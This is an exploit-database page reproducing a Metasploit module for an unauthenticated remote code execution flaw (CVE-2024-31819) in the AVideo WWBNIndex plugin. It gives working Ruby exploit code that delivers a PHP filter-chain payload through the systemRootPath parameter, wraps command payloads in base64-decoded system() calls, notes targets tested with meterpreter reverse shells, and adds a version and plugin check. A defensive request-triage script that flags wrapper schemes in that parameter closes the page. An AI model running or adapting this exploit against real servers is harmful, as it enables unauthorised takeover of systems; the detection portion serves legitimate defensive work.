The Exploit Database - CXSecurity.com 2024-07-05
AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution

 

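This module shows that the WWBNIndex plugin of the AVideo platform has an unauthenticated remote code execution vulnerability. An attacker can use it to execute arbitrary PHP code on the server and take control of the affected system. The vulnerability requires no authentication and carries significant risk.

🧐 The `submitIndex.php` file in the WWBNIndex plugin of the AVideo platform is vulnerable: user input is passed directly to the `require()` function without proper sanitization, which lets an attacker use the PHP filter chaining technique to execute arbitrary PHP code.

😱 The vulnerability requires no authentication, so any remote attacker can exploit it. It lets the attacker execute commands on the server and control the affected system, which makes it extremely dangerous.

📋 The vulnerability affects multiple platforms, including php, unix, linux and win, with corresponding test methods and exploitation approaches for each platform.

🔍 A detection method is provided: requests are sent to check the AVideo version and whether the WWBNIndex plugin is present, in order to determine whether the system is vulnerable.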

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::PhpFilterChain
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution (RCE) vulnerability
          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
          submitIndex.php file, where user-supplied input is passed directly to the require()
          function without proper sanitization. By exploiting this, an attacker can leverage the
          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
          for the execution of commands and control over the affected system. The exploit is
          particularly dangerous because it does not require authentication, making it possible
          for any remote attacker to exploit this vulnerability.
        },
        'Author' => [
          'Valentin Lobstein'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-31819'],
          ['URL', 'https://github.com/WWBN/AVideo'],
          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
        ],
        'Platform' => ['php', 'unix', 'linux', 'win'],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix In-Memory',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows In-Memory',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2024-04-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443,
          'FETCH_WRITABLE_DIR' => '/tmp'
        }
      )
    )
  end

  def exploit
    # PHP targets run the payload directly; command targets wrap it in system()
    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
    filter_payload = generate_php_filter_payload(php_code)

    # The filter chain is delivered in the systemRootPath form parameter
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
      'ctype' => 'application/x-www-form-urlencoded',
      'data' => "systemRootPath=#{filter_payload}"
    )
    print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code
  end

  def check
    # Step 1: read the AVideo version from the landing page
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET',
      'follow_redirect' => true
    })
    return CheckCode::Unknown('Failed to connect to the target.') unless res
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
    return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]

    version = Rex::Version.new(version_match[1])

    # Step 2: confirm the plugin endpoint is reachable
    plugin_check = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
      'method' => 'GET'
    })
    # Report Safe and stop when the plugin endpoint does not answer with 200
    unless plugin_check&.code == 200
      return CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')
    end

    # Step 3: compare against the affected version range
    if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")
    end

    CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")
  end
end
```
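The module lists `IOC_IN_LOGS` among its side effects, and the request it sends has a fixed shape: a POST to `plugin/WWBNIndex/submitIndex.php` carrying `systemRootPath`. The triage below is an added example, not part of the module or of AVideo; the record shape, the constant and function names, and the assumption that a proxy or WAF captures form bodies are all hypothetical.

```ruby
require 'uri'

# Endpoint and parameter name as used by the module above.
ENDPOINT = %r{/plugin/WWBNIndex/submitIndex\.php\z}i
PARAM    = 'systemRootPath'
# A URL-style scheme (php://, data://, ...) never belongs in a filesystem path.
WRAPPER  = %r{\A\s*[a-z][a-z0-9+.-]*://}i

# Classify one request record. The record shape { method:, uri:, body: } is an
# assumption: it needs a proxy or WAF that captures form bodies.
# Returns :ignore, :review (endpoint touched) or :alert (wrapper in parameter).
def classify_request(req)
  path = req[:uri].to_s.split('?', 2).first.to_s
  return :ignore unless path.match?(ENDPOINT)
  return :review unless req[:method].to_s.casecmp?('POST')

  begin
    pairs = URI.decode_www_form(req[:body].to_s)
  rescue ArgumentError
    return :review # non-ASCII body: cannot decode, leave for a human
  end
  values = pairs.select { |key, _| key == PARAM }.map(&:last)
  values.any? { |v| v.match?(WRAPPER) } ? :alert : :review
end

# Constructed sample records (not taken from real traffic).
SAMPLES = [
  { method: 'GET',  uri: '/index.php', body: '' },
  { method: 'GET',  uri: '/plugin/WWBNIndex/submitIndex.php', body: '' },
  { method: 'POST', uri: '/plugin/WWBNIndex/submitIndex.php',
    body: 'systemRootPath=/var/www/html/AVideo/' },
  { method: 'POST', uri: '/avideo/plugin/WWBNIndex/submitIndex.php?x=1',
    body: 'systemRootPath=php%3A%2F%2Ffilter%2Fresource%3Dphp%3A%2F%2Ftemp' }
].freeze

# Classify a batch of records, preserving order.
def triage(records)
  records.map { |r| classify_request(r) }
end

puts triage(SAMPLES).inspect if $PROGRAM_NAME == __FILE__
```

A `:review` on a bare GET matches the probe the module's `check` method sends, so it is worth correlating with a preceding request for `index.php` from the same client.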
